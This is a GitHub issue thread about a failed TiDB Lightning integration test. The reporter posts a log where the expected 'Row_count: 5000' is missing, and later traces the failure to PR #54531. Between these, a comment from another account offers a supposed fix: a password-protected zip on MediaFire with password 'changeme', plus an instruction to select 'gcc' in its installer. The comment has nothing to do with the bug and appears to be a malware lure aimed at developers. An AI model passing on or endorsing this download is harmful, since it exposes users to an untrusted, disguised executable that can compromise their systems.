### ISSUE TITLE
master branch pull-lightning-integration-test failed

### ISSUE THREAD

**Issue by lcwangchao** [pingcap/tidb#55713]
https://do.pingcap.net/jenkins/blue/organizations/jenkins/pingcap%2Ftidb%2Fpull_lightning_integration_test/detail/pull_lightning_integration_test/1193/pipeline/306

```

*************************** 1. row ***************************

count(i): 5000

  sum(i): 17502500

TEST FAILED: OUTPUT DOES NOT CONTAIN 'Row_count: 5000'

____________________________________

[Wed Aug 28 11:54:09 CST 2024] Executing SQL: SHOW STATS_META WHERE Table_name = 'tbl';

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

script returned exit code 1
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lcwangchao** [comment]
seems caused by #54531 after bisect
